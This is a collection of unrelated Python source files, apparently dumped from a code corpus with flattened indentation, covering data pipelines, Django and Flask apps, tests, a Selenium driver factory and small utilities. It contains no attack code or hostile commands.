content = data.get('content', '').encode('unicode_escape')
url = data.get('url', '')
parser = Parser(content)
identifier = Identify(
self.identifiers,
content,
url,
**{'parser': parser, 'ignore_case': True}
)
identifier.identify()
data['identity'] = identifier.to_json()
return data
class ParseTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
params = {}
def requires(self):
return IdentifyTask(input_file=self.input_file, yaml_file=self.yaml_file)
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'parsed'
))
def run(self):
''' '''
self._configure()
f = self.input().open('r')
data = json.loads(f.read())
new_data = self.process_response(data)
with self.output().open('w') as out_file:
out_file.write(json.dumps(new_data, indent=4))
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Parse')
self.output_path = config.get('output_directory', '')
self.params = config.get('params', {})
def process_response(self, data):
content = data.get('content', '').encode('unicode_escape')
url = data.get('url', '')
identity = data.get('identity', {})
processor = Processor(identity, content, url)
if not processor:
return {}
description = processor.reader.parse_service()
description['solr_identifier'] = data['sha']
description['source_url'] = url
del data['content']
data['service_description'] = description
return data
class TripleTask(luigi.Task):
yaml_file = luigi.Parameter()
input_file = luigi.Parameter()
output_path = ''
params = {}
def requires(self):
return ParseTask(input_file=self.input_file, yaml_file=self.yaml_file)
def output(self):
return luigi.LocalTarget(
generate_output_filename(
self.input_file,
self.output_path,
'triples',
'.ttl'
))
def run(self):
''' '''
self._configure()
f = self.input().open('r')
data = json.loads(f.read())
new_data, document_urn = self.process_response(data)
if new_data is not None and new_data:
with open(self.output().path.replace('.ttl', '.txt'), 'w') as f:
f.write(document_urn)
with self.output().open('w') as out_file:
out_file.write(new_data)
def _configure(self):
config = parse_yaml(self.yaml_file)
config = extract_task_config(config, 'Triple')
self.output_path = config.get('output_directory', '')
self.params = config.get('params', {})
def process_response(self, data):
storage_endpoint = 'http://54.69.87.196:8080/parliament/sparql'
store, document_urn = triplify(data)
if store is not None:
# write it out to turtle for the idempotent output
turtle = store.serialize('turtle')
# post it to parliament
storify(storage_endpoint, triples_as_nt=store.serialize('nt'), option='INSERT')
return turtle, document_urn
return '', ''
class MainWorkflow(luigi.Task):
doc_dir = luigi.Parameter()
yaml_file = luigi.Parameter()
def requires(self):
return [TripleTask(input_file=f, yaml_file=self.yaml_file) for f in self._iterator()]
def output(self):
return luigi.LocalTarget('log.txt')
def run(self):
self._configure()
def _configure(self):
config = parse_yaml(self.yaml_file)
run_init(config)
def _iterator(self):
for f in glob.glob(os.path.join(self.doc_dir, '*.json')):
yield f
|
python
|
# -*- coding: utf-8 -*-
# @version : ??
# @Time : 2017/3/29 17:31
# @Author : Aries
# @Site :
# @File : shutil_0329.py
# @Software: PyCharm
import zipfile
"""
压缩 解压 .zip包
"""
# 压缩
z = zipfile.ZipFile('laxi.zip', 'w')
z.write('test.txt')
z.write('test2.xml')
z.close()
# 解压
z = zipfile.ZipFile('laxi.zip', 'r')
z.extractall()
z.close()
import tarfile
"""
压缩 解压 .tar包
"""
# 压缩
tar = tarfile.open('two.tar', 'w')
tar.add('E:\Python3.6\practice', arcname='demo02.xml')
tar.add('E:\Python3.6\practice', arcname='test.txt')
tar.close()
# 解压
tar = tarfile.open('two.tar', 'r')
tar.extractall() # 可设置解压地址
tar.close()
|
python
|
# Time: O(r * c)
# Space: O(1)
# Given a matrix A, return the transpose of A.
#
# The transpose of a matrix is the matrix flipped over it's main diagonal,
# switching the row and column indices of the matrix.
#
# Example 1:
#
# Input: [[1,2,3],[4,5,6],[7,8,9]]
# Output: [[1,4,7],[2,5,8],[3,6,9]]
# Example 2:
#
# Input: [[1,2,3],[4,5,6]]
# Output: [[1,4],[2,5],[3,6]]
#
# Note:
# - 1 <= A.length <= 1000
# - 1 <= A[0].length <= 1000
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
class Solution(object):
def transpose(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
result = [[None] * len(A) for _ in xrange(len(A[0]))]
for r, row in enumerate(A):
for c, val in enumerate(row):
result[c][r] = val
return result
# Time: O(r * c)
# Space: O(1)
class Solution2(object):
def transpose(self, A):
"""
:type A: List[List[int]]
:rtype: List[List[int]]
"""
return zip(*A)
|
python
|
import logging
from typing import List
from api.token.service import Token
from api.calendar.service import CalendarService, Calendar
LOG = logging.getLogger(__name__)
class GoogleCalendarService(CalendarService):
IGNORED_CALENDARS = {'addressbook#[email protected]',
'en.polish#[email protected]'}
def __init__(self, api_client):
self.api_client = api_client
def __retrieve_identifiers(self, calendars):
return list(filter(lambda x: x not in self.IGNORED_CALENDARS,
map(lambda calendar: Calendar(identifier=calendar['id']), calendars.get('items'))))
def fetch(self, token: Token) -> List[Calendar]:
params = {}
calendars = self.api_client.get('calendar/v3/users/me/calendarList', token.value, params)
return self.__retrieve_identifiers(calendars)
|
python
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
from setuptools import setup
import codecs
def read(rel_path):
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, rel_path), 'r') as fp:
return fp.read()
def get_version(rel_path):
for line in read(rel_path).splitlines():
if line.startswith('__version__'):
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError("Unable to find version string.")
with open('README.rst') as readme_file:
readme = readme_file.read()
setup(
name='fedmix_backend',
version=get_version('fedmix_backend/__version__.py'),
description="GraphQL backend for the fedmix frontend",
long_description=readme + '\n\n',
author="Berend Weel",
author_email='[email protected]',
url='https://github.com/FEDMix/fedmix_backend',
packages=[
'fedmix_backend',
],
install_requires=[
'graphene>=2.1.8, <3',
'flask>=1.1.2, <2',
'flask-graphql>=2.0.1, <3',
'natsort>=7, <8',
],
include_package_data=True,
license="Apache Software License 2.0",
zip_safe=False,
keywords='fedmix-backend',
entry_points={
'console_scripts':
['fedmix-backend=fedmix_backend.fedmix_backend:main'],
},
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
test_suite='tests',
setup_requires=[
'wheel',
# dependency for `python setup.py test`
'pytest-runner',
# dependencies for `python setup.py build_sphinx`
'sphinx',
'sphinx_rtd_theme',
'recommonmark'
],
tests_require=[
'pytest',
'pytest-cov',
'pytest-pylint',
],
extras_require={
'dev': ['prospector[with_pyroma]', 'yapf', 'isort'],
},
)
|
python
|
import os
import re
from string import letters
import random
import hashlib
import hmac
import webapp2
import jinja2
from jinja2 import Environment
from google.appengine.ext import db
from Handler import Handler
class Logout(Handler):
""" handles user logout safely """
def get(self):
self.logout()
self.redirect('/login')
return
|
python
|
import numpy as np
import inspect # Used for storing the input
from .element import Element
from .equation import PotentialEquation
__all__ = ['Constant', 'ConstantStar']
class ConstantBase(Element, PotentialEquation):
def __init__(self, model, xr=0, yr=0, hr=0.0, layer=0, \
name='ConstantBase', label=None, aq=None):
self.storeinput(inspect.currentframe())
Element.__init__(self, model, nparam=1, nunknowns=1, layers=layer, \
name=name, label=label)
self.nparam = 1 # Defined here and not in Element as other elements can have multiple parameters per layers
self.nunknowns = 0
self.xr = xr
self.yr = yr
self.hr = hr
self.aq = aq
self.model.add_element(self)
def __repr__(self):
return self.name + ' at ' + str(
(self.xr, self.yr)) + ' with head ' + str(self.hr)
def initialize(self):
if self.aq is None:
self.aq = self.model.aq.find_aquifer_data(self.xr, self.yr)
self.aq.add_element(self)
self.ncp = 1
self.xc = np.array([self.xr])
self.yc = np.array([self.yr])
self.pc = self.hr * self.aq.T[self.layers]
self.parameters = np.atleast_2d(self.pc)
def potinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((1, aq.naq))
if aq == self.aq:
rv[0, 0] = 1
return rv
def disvecinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, 1, aq.naq))
return rv
class Constant(ConstantBase, PotentialEquation):
"""
Specify the head at one point in the model in one layer.
The head may only be specified in an area of the model where
the aquifer system is confined.
Parameters
----------
model : Model object
model to which the element is added
xr : float
x-coordinate of the point where the head is specified
yr : float
y-coordinate of the point where the head is specified
hr : float
specified head
rw : float
radius of the well
layer : int
layer where the head is specified
label : string or None (default: None)
label of the element
"""
def __init__(self, model, xr=0, yr=0, hr=0.0, layer=0, label=None):
self.storeinput(inspect.currentframe())
ConstantBase.__init__(self, model, xr=xr, yr=yr, hr=hr, layer=layer, \
name='Constant', label=label)
self.nunknowns = 1
def initialize(self):
ConstantBase.initialize(self)
assert self.aq.ilap, 'Constant element added to area that is ' \
'semi-confined'
self.resfac = np.zeros(1) # required for HeadEquation
self.strengthinf = np.zeros(1) # required for HeadEquation
def setparams(self, sol):
self.parameters[:, 0] = sol
class ConstantInside(Element):
# Sets constant at points xc, yc equal to the average of the potential of all elements at points xc, yc
# Used for the inside of an inhomogeneity
def __init__(self, model, xc=0, yc=0, label=None):
Element.__init__(self, model, nparam=1, nunknowns=1,
layers=list(range(model.aq.naq)), \
name='ConstantInside', label=label)
self.xc = np.atleast_1d(xc)
self.yc = np.atleast_1d(yc)
self.parameters = np.zeros((1, 1))
self.model.add_element(self)
def __repr__(self):
return self.name
def initialize(self):
self.aq = self.model.aq.find_aquifer_data(self.xc[0], self.yc[0])
self.aq.add_element(self)
self.ncp = len(self.xc)
def potinf(self, x, y, aq=None):
'''Can be called with only one x,y value'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((1, aq.naq))
if aq == self.aq:
rv[0, 0] = 1
return rv
def disvecinf(self, x, y, aq=None):
'''Can be called with only one x,y value'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, 1, aq.naq))
return rv
def equation(self):
mat = np.zeros((1, self.model.neq))
rhs = np.zeros(1) # Needs to be initialized to zero
for icp in range(self.ncp):
ieq = 0
for e in self.model.elementlist:
if e. nunknowns > 0:
if e != self:
mat[0:, ieq:ieq + e. nunknowns] += \
e.potinflayers(self.xc[icp], self.yc[icp],
self.layers).sum(0)
ieq += e. nunknowns
# else:
# mat[0, ieq:ieq+e. nunknowns] += -1
else:
rhs[0] -= \
e.potentiallayers(self.xc[icp], self.yc[icp],
self.layers).sum(0)
return mat, rhs
def setparams(self, sol):
self.parameters[:, 0] = sol
#class ConstantStar(Element, PotentialEquation):
# I don't think we need the equation
class ConstantStar(Element):
def __init__(self, model, hstar=0.0, label=None, aq=None):
Element.__init__(self, model, nparam=1, nunknowns=0, layers=0, \
name='ConstantStar', label=label)
assert hstar is not None, 'a value for hstar needs to be specified'
self.hstar = hstar
self.aq = aq
self.model.add_element(self)
def __repr__(self):
return self.name + ' with head ' + str(self.hstar)
def initialize(self):
self.aq.add_element(self)
self.aq.constantstar = self
self.parameters = np.zeros((1, 1))
self.potstar = self.hstar * self.aq.T
def potinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((1, aq.naq))
return rv
def potentiallayers(self, x, y, layers, aq=None):
'''Returns array of size len(layers) only used in building equations
Defined here as it is the particular solution inside a semi-confined aquifer
and cannot be added by using eigen vectors'''
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
pot = np.zeros(len(layers))
if aq == self.aq:
pot[:] = self.potstar[layers]
return pot
def disvecinf(self, x, y, aq=None):
if aq is None: aq = self.model.aq.find_aquifer_data(x, y)
rv = np.zeros((2, 1, aq.naq))
return rv
|
python
|
from mangofmt import MangoFile, EncryptionType, CompressionType, Language
def test_title():
mango = MangoFile()
meta = mango.meta_data
assert meta.title == None
meta.title = "test"
assert meta.title == "test"
def test_author():
mango = MangoFile()
meta = mango.meta_data
assert meta.author == None
meta.author = "test"
assert meta.author == "test"
def test_publisher():
mango = MangoFile()
meta = mango.meta_data
assert meta.publisher == None
meta.publisher = "test"
assert meta.publisher == "test"
def test_source():
mango = MangoFile()
meta = mango.meta_data
assert meta.source == None
meta.source = "test"
assert meta.source == "test"
def test_source():
mango = MangoFile()
meta = mango.meta_data
assert meta.translation == None
meta.translation = "test"
assert meta.translation == "test"
def test_volume():
mango = MangoFile()
meta = mango.meta_data
assert meta.volume == None
meta.volume = 2
assert meta.volume == 2
def test_chapter():
mango = MangoFile()
meta = mango.meta_data
assert meta.chapter == None
meta.chapter = 2
assert meta.chapter == 2
def test_year():
mango = MangoFile()
meta = mango.meta_data
assert meta.year == None
meta.year = 2
assert meta.year == 2
def test_language():
mango = MangoFile()
meta = mango.meta_data
assert meta.language == None
meta.language = Language.EN
assert meta.language == Language.EN
|
python
|
import simplejson as json
from django.db.models import Q
from django.http import JsonResponse
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie
import directory.models as directory
from appconf.manager import SettingManager
from laboratory.decorators import group_required
from podrazdeleniya.models import Podrazdeleniya
@ensure_csrf_cookie
@login_required
def menu(request):
return redirect('/ui/construct/menu')
@login_required
@group_required("Оператор", "Конструктор: Лабораторные исследования")
@ensure_csrf_cookie
def researches(request):
""" Конструктор исследований """
labs = Podrazdeleniya.objects.filter(p_type=Podrazdeleniya.LABORATORY)
return render(request, 'construct_researches.html', {"labs": labs, "variants": directory.ResultVariants.objects.all()})
@login_required
@group_required("Оператор", "Конструктор: Лабораторные исследования")
@ensure_csrf_cookie
def researches_tune(request):
""" Настройка исследований """
pk = request.GET["pk"]
return render(request, 'construct_researches_tune.html', {"pk": pk, "material_types": directory.MaterialVariants.objects.all()})
@login_required
@group_required("Оператор", "Конструктор: Лабораторные исследования")
@ensure_csrf_cookie
def researches_tune_ng(request):
""" Настройка исследований """
pk = request.GET["pk"]
return render(request, 'construct_researches_tune_ng.html', {"pk": pk})
@login_required
@group_required("Оператор", "Конструктор: Ёмкости для биоматериала")
@ensure_csrf_cookie
def tubes(request):
""" Создание и редактирование ёмкостей """
return render(request, 'construct_tubes.html')
@login_required
@group_required("Оператор", "Конструктор: Группировка исследований по направлениям")
@ensure_csrf_cookie
def directions_group(request):
""" Группировка по направлениям """
labs = Podrazdeleniya.objects.filter(Q(p_type=Podrazdeleniya.LABORATORY) | Q(p_type=Podrazdeleniya.PARACLINIC))
return render(request, 'construct_directions_group.html', {"labs": labs})
@login_required
@group_required("Оператор", "Конструктор: Настройка УЕТов")
@ensure_csrf_cookie
def uets(request):
""" Настройка УЕТов """
labs = Podrazdeleniya.objects.filter(p_type=Podrazdeleniya.LABORATORY)
return render(request, 'uets.html', {"labs": labs})
@csrf_exempt
@login_required
@group_required("Оператор", "Группировка исследований по направлениям")
@ensure_csrf_cookie
def onlywith(request):
""" Настройка назначения анализов вместе """
if request.method == "GET":
labs = Podrazdeleniya.objects.filter(p_type=Podrazdeleniya.LABORATORY)
return render(request, 'onlywith.html', {"labs": labs})
elif request.method == "POST":
pk = int(request.POST["pk"])
onlywith_value = int(request.POST.get("onlywith", "-1"))
res = directory.Researches.objects.get(pk=pk)
if onlywith_value > -1:
res.onlywith = directory.Researches.objects.get(pk=onlywith_value)
res.save()
else:
res.onlywith = None
res.save()
return JsonResponse({"ok": True})
@csrf_exempt
@login_required
def refs(request):
""" Настройка назначения анализов вместе """
if request.method == "GET":
rows = []
fraction = directory.Fractions.objects.get(pk=int(request.GET["pk"]))
for r in directory.References.objects.filter(fraction=fraction).order_by("pk"):
rows.append(
{
'pk': r.pk,
'title': r.title,
'about': r.about,
'ref_m': json.loads(r.ref_m) if isinstance(r.ref_m, str) else r.ref_m,
'ref_f': json.loads(r.ref_f) if isinstance(r.ref_f, str) else r.ref_f,
'del': False,
'hide': False,
'isdefault': r.pk == fraction.default_ref_id,
}
)
return JsonResponse(rows, safe=False)
elif request.method == "POST":
pk = int(request.POST["pk"])
default = int(request.POST["default"])
if pk > -1:
fraction = directory.Fractions.objects.get(pk=pk)
for r in json.loads(request.POST["refs"]):
r["ref_m"].pop("", None)
r["ref_f"].pop("", None)
if r["del"] and r["pk"] != -1:
directory.References.objects.filter(pk=r["pk"]).delete()
if r["pk"] == default:
default = -1
elif not r["del"] and r["pk"] == -1:
nrf = directory.References(title=r["title"], about=r["about"], ref_m=r["ref_m"], ref_f=r["ref_f"], fraction=fraction)
nrf.save()
if r["isdefault"]:
default = nrf.pk
else:
row = directory.References.objects.get(pk=r["pk"])
row.title = r["title"]
row.about = r["about"]
row.ref_m = json.dumps(r["ref_m"])
row.ref_f = json.dumps(r["ref_f"])
row.save()
fraction.default_ref = None if default == -1 else directory.References.objects.get(pk=default)
fraction.save()
return JsonResponse({"ok": True})
@login_required
@group_required("Оператор", "Конструктор: Параклинические (описательные) исследования")
@ensure_csrf_cookie
def researches_paraclinic(request):
if SettingManager.get("paraclinic_module", default='false', default_type='b'):
return render(request, 'construct_paraclinic.html')
else:
return redirect('/')
@login_required
@group_required("Оператор", "Конструктор: консультации")
@ensure_csrf_cookie
def construct_consults(request):
if SettingManager.get("consults_module", default='false', default_type='b'):
return render(request, 'construct_consults.html')
else:
return redirect('/')
@login_required
@group_required("Оператор", "Конструктор: Настройка шаблонов")
@ensure_csrf_cookie
def construct_templates(request):
return render(request, 'construct_templates.html')
@login_required
@group_required("Оператор", "Конструктор: Настройка микробиологии")
@ensure_csrf_cookie
def construct_bacteria(request):
return render(request, 'construct_bacteria.html')
@login_required
@group_required("Конструктор: Д-учет")
@ensure_csrf_cookie
def construct_dispensary_plan(request):
return render(request, 'construct_dplan.html')
|
python
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""Tests of deployment."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import base64
import mock
from asyncat.client import GithubError
from hindsight.finder import NoSuchPullRequest
from . import HindsightTestCase
class BuildbotTestCase(HindsightTestCase):
"""Tests for buildbot."""
def _get_packets(self):
"""Returns test packets."""
with open(self.get_file_path("_buildbot-packets.json")) as f:
return f.read()
def test_secret_mismatch(self):
"""Secret mismatch should returns 403."""
resp = self.fetch("/deployment", body=self.make_body({
"secret": "secret",
"packets": self._get_packets()
}), method="POST")
self.assertEqual(resp.code, 403)
def _push(self):
"""Push event."""
return self.fetch("/deployment", body=self.make_body({
"secret": "mock-secret",
"packets": self._get_packets()
}), method="POST")
@mock.patch("hindsight.app.Application.find_pull", autospec=True)
def test_pull_not_found(self, mock_find_pull):
"""Pull request not found."""
mock_find_pull.return_value = self.make_future(NoSuchPullRequest())
resp = self._push()
self.assertEqual(resp.code, 200)
self.assertEqual(resp.body, b'OK')
mock_find_pull.return_value = self.make_future(GithubError())
resp = self._push()
self.assertEqual(resp.code, 404)
@mock.patch("hindsight.finder.PullRequestFinder.find", autospec=True)
def test_find_pull_via_sha(self, mock_find):
"""Find pull request via sha in event."""
mock_pull_cls = mock.create_autospec("asyncat.repository.PullRequest")
mock_pull = mock_pull_cls.return_value
mock_pull.create_comment.return_value = self.make_future(None)
mock_find.return_value = self.make_future(mock_pull)
self._push()
self.assertTrue(mock_pull.create_comment.called)
class Buildbot9TestCase(HindsightTestCase):
"""Buildbot 9 test case."""
def _get_payload(self, type_="done"):
"""Returns test payload."""
with open(self.get_file_path("_buildbot9-{}.json".format(type_))) as f:
return f.read()
def test_secret_mismatch(self):
"""Secret mismatch should returns 403."""
resp = self.fetch(
"/deployment",
body=self._get_payload(),
headers={
"Authorization": "Basic {}".format(
base64.b64encode(
"buildbot:{}".format("secret").encode("utf8")
).decode("utf8"),
)
},
method="POST",
)
self.assertEqual(resp.code, 403)
def _push(self, type_):
"""Push event."""
return self.fetch(
"/deployment",
body=self._get_payload(type_),
headers={
"Authorization": "Basic {}".format(
base64.b64encode(
"buildbot:{}".format("mock-secret").encode("utf8"),
).decode("utf8"),
)
},
method="POST",
)
@mock.patch("hindsight.app.Application.find_pull", autospec=True)
def test_pull_not_found(self, mock_find_pull):
"""Could not found pull request."""
mock_find_pull.return_value = self.make_future(NoSuchPullRequest())
resp = self._push("done")
self.assertEqual(resp.code, 200)
self.assertEqual(resp.body, b'OK')
mock_find_pull.return_value = self.make_future(GithubError())
resp = self._push("done")
self.assertEqual(resp.code, 404)
@mock.patch("hindsight.finder.PullRequestFinder.find", autospec=True)
def test_find_pull_via_sha(self, mock_find):
"""Find pull request via sha in event."""
mock_pull_cls = mock.create_autospec("asyncat.repository.PullRequest")
mock_pull = mock_pull_cls.return_value
mock_pull.create_comment.return_value = self.make_future(None)
mock_find.return_value = self.make_future(mock_pull)
self._push("done")
self.assertTrue(mock_pull.create_comment.called)
|
python
|
def mdc(m, n):
while m % n != 0:
oldm = m
oldn = n
m = oldn
n = oldm % oldn
return n
def separadorFrac(frac):
novoNum = frac.getNum()
inteiro = 0
while novoNum > frac.getDen():
novoNum -= frac.getDen()
inteiro += 1
return inteiro, novoNum
def somarInteiro(parteInteira, parteNum):
inteiro = parteInteira + parteNum
return inteiro
class Fracao:
def __init__(self, num, den):
self.__num = num
self.__den = den
def __str__(self):
return str(self.__num) + "/" + str(self.__den)
def getNum(self):
return self.__num
def getDen(self):
return self.__den
def simplifica(self):
divComum = mdc(self.__num, self.__den)
self.__num = self.__num // divComum
self.__den = self.__den // divComum
def __add__(self, outraFrac):
novoNum = self.__num * outraFrac.getDen() + self.__den * outraFrac.getNum()
novoDen = self.__den * outraFrac.getDen()
divComum = mdc(novoNum, novoDen)
return Fracao(novoNum//divComum, novoDen//divComum)
class fracaoMista(Fracao):
def __init__(self, parteInteira, num, den):
super().__init__(num, den)
self.__parteInteira = parteInteira
def getParteInteira(self):
return self.__parteInteira
def juntar(self):
novoNum = (self.__parteInteira * self.getDen()) + self.getNum()
return Fracao(novoNum, self.getDen())
def __add__(self, outraFrac):
novoNum = self.getNum() * outraFrac.getDen() + self.getDen() * outraFrac.getNum()
novoDen = self.getDen() * outraFrac.getDen()
divComum = mdc(novoNum, novoDen)
return Fracao(novoNum//divComum, novoDen//divComum)
def __str__(self):
if self.__parteInteira > 0 and self.getNum() < self.getDen():
return str(self.__parteInteira) + ' ' + str(self.getNum()) + '/' + str(self.getDen())
elif self.__parteInteira >= 0 and self.getNum() == self.getDen():
inteiro = somarInteiro(self.__parteInteira, 1)
return str(inteiro)
else:
return str(self.getNum()) + '/' + str(self.getDen())
frac1 = Fracao(7, 6)
frac2 = Fracao(13, 7)
frac3 = frac1 + frac2
inteiro, numerador = separadorFrac(frac3)
print(fracaoMista(inteiro, numerador, frac3.getDen()))
print()
frac1 = Fracao(1, 3)
frac2 = Fracao(2, 3)
frac3 = frac1 + frac2
inteiro, numerador = separadorFrac(frac3)
print(fracaoMista(inteiro, numerador, frac3.getDen()))
print()
frac1 = fracaoMista(3, 1, 2)
frac2 = fracaoMista(4, 2, 3)
frac3 = frac1.juntar() + frac2.juntar()
inteiro, numerador = separadorFrac(frac3)
print(fracaoMista(inteiro, numerador, frac3.getDen()))
|
python
|
# -*- coding:utf-8 -*-
# 数据库定义
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_cache import Cache
import memcache
import os
curdir = os.getcwd()
static_dir = curdir+'/static'
template_dir = curdir+'/templates'
app = Flask(__name__,static_folder=static_dir,template_folder=template_dir)
cacheClient = memcache.Client(servers=['127.0.0.1:11211'])
# dialect+driver://username:password@host:port/database?charset=utf8
# 配置 sqlalchemy 数据库驱动://数据库用户名:密码@主机地址:端口/数据库?编码
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+mysqlconnector://root:[email protected]:3306/pss?charset=utf8'
# 初始化
db = SQLAlchemy(app)
cache = Cache(config={'CACHE_TYPE': 'memcached',
'CACHE_MEMCACHED_SERVERS':["127.0.0.1:11211"]})
cache.init_app(app)
|
python
|
SYMBOLS = \
[
# 1
'?', '!', '¿', '¡', ',', '.', '@', '#', '%', '&', '-',
'(', ')', '[', ']', ';', ':', '′', '‘', '’', '‚', '‛',
'\\', '/', '{', '}', '•', '…', '″', '“', '”', '„', '_',
'<', '>', '«', '»', '←', '→', '↑', '↓', '⇒', '⇔', '˜',
'$', '¢', '€', '£', '¥', '₽', '₩', '𝑓', '¤', '|', '^',
# 2
'ˊ', 'ˋ', '+', '-', '×', '÷', '=', '±', '∞', '√', '¬',
'∀', '⊂', '⊃', '∴', '∵', '⁀', 'μ', '№', '°', '′', '∂',
'¹', '²', '³', '¼', '½', '¾', '*', '♪', '♭', '♀', '♂',
'⚪', '⚫', '◎', '◻', '◼', '◇', '◆', '△', '▲', '▽', '▼',
'☆', '★', '♡', '♥', '©', '®', '™', '§', '¶', '†', '⍑',
# 3
'α', 'β', 'γ', 'δ', 'ε', 'ζ', 'η', 'θ', 'ι', 'κ', 'λ',
'μ', 'ν', 'ξ', 'ο', 'π', 'ρ', 'σ', 'τ', 'υ', 'φ', 'χ',
'ψ', 'ω',
# 4
'Α', 'Β', 'Γ', 'Δ', 'Ε', 'Ζ', 'Η', 'Θ', 'Ι', 'Κ', 'Λ',
'Μ', 'Ν', 'Ξ', 'Ο', 'Π', 'Ρ', 'Σ', 'Τ', 'Υ', 'Φ', 'Χ',
'Ψ', 'Ω',
]
SYMBOLS_REMOVED_DUPES = []
[SYMBOLS_REMOVED_DUPES.append(char) for char in SYMBOLS if char not in SYMBOLS_REMOVED_DUPES]
SYMBOLS_VALID_FOR_NAME_ONLY = [char for char in SYMBOLS_REMOVED_DUPES
if char != '%'
and char != '@'
and char != '\\'
and char != '₽'
and char != '₩'
and char != '♡'
and char != '♥']
|
python
|
"""
DriverFactory class
Note: Change this class as you add support for:
1. SauceLabs/BrowserStack
2. More browsers like Opera
"""
import dotenv,os,sys,requests,json
from datetime import datetime
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome import service
from selenium.webdriver.remote.webdriver import RemoteConnection
from conf import opera_browser_conf
class DriverFactory():
def __init__(self,browser='ff',browser_version=None,os_name=None):
"Constructor for the Driver factory"
self.browser=browser
self.browser_version=browser_version
self.os_name=os_name
def get_web_driver(self,remote_flag,os_name,os_version,browser,browser_version):
"Return the appropriate driver"
if (remote_flag.lower() == 'n'):
web_driver = self.run_local(os_name,os_version,browser,browser_version)
else:
print("DriverFactory does not know the browser: ",browser)
web_driver = None
return web_driver
def run_local(self,os_name,os_version,browser,browser_version):
"Return the local driver"
local_driver = None
if browser.lower() == "ff" or browser.lower() == 'firefox':
local_driver = webdriver.Firefox()
elif browser.lower() == "ie":
local_driver = webdriver.Ie()
elif browser.lower() == "chrome":
local_driver = webdriver.Chrome()
elif browser.lower() == "opera":
opera_options = None
try:
opera_browser_location = opera_browser_conf.location
options = webdriver.ChromeOptions()
options.binary_location = opera_browser_location # path to opera executable
local_driver = webdriver.Opera(options=options)
except Exception as e:
print("\nException when trying to get remote webdriver:%s"%sys.modules[__name__])
print("Python says:%s"%str(e))
if 'no Opera binary' in str(e):
print("SOLUTION: It looks like you are trying to use Opera Browser. Please update Opera Browser location under conf/opera_browser_conf.\n")
elif browser.lower() == "safari":
local_driver = webdriver.Safari()
return local_driver
def get_firefox_driver(self):
"Return the Firefox driver"
driver = webdriver.Firefox(firefox_profile=self.get_firefox_profile())
return driver
def get_firefox_profile(self):
"Return a firefox profile"
return self.set_firefox_profile()
def set_firefox_profile(self):
"Setup firefox with the right preferences and return a profile"
try:
self.download_dir = os.path.abspath(os.path.join(os.path.dirname(__file__),'..','downloads'))
if not os.path.exists(self.download_dir):
os.makedirs(self.download_dir)
except Exception as e:
print("Exception when trying to set directory structure")
print(str(e))
profile = webdriver.firefox.firefox_profile.FirefoxProfile()
set_pref = profile.set_preference
set_pref('browser.download.folderList', 2)
set_pref('browser.download.dir', self.download_dir)
set_pref('browser.download.useDownloadDir', True)
set_pref('browser.helperApps.alwaysAsk.force', False)
set_pref('browser.helperApps.neverAsk.openFile', 'text/csv,application/octet-stream,application/pdf')
set_pref('browser.helperApps.neverAsk.saveToDisk', 'text/csv,application/vnd.ms-excel,application/pdf,application/csv,application/octet-stream')
set_pref('plugin.disable_full_page_plugin_for_types', 'application/pdf')
set_pref('pdfjs.disabled',True)
return profile
|
python
|
from django.test import TestCase
from django.urls import reverse, resolve
from media_server.views import (
VideoListCreateView,
VideoRetrieveUpdateDestroyView,
GenreListCreateView,
GenreRetrieveUpdateDestroyView
)
class VideoListCreateViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('video_list_create')
self.assertEqual(resolve(url).func.view_class, VideoListCreateView)
class VideoRetrieveUpdateDestroyViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('video_read_update_delete', kwargs={'slug': 'video-1'})
self.assertEqual(resolve(url).func.view_class, VideoRetrieveUpdateDestroyView)
class GenreListCreateViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('genre_list_create')
self.assertEqual(resolve(url).func.view_class, GenreListCreateView)
class GenreRetrieveUpdateDestroyViewUrlsTests(TestCase):
def test_urls(self):
url = reverse('genre_read_update_delete', kwargs={'slug': 'genre-1'})
self.assertEqual(resolve(url).func.view_class, GenreRetrieveUpdateDestroyView)
|
python
|
# Copyright (C) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions
# and limitations under the License.
#
#
# SPDX-License-Identifier: Apache-2.0
import logging
from os.path import splitext
from collections import defaultdict
from wca.runners import Runner
from prm.model_distribution.metric import Metric
from prm.model_distribution.model import DistriModel
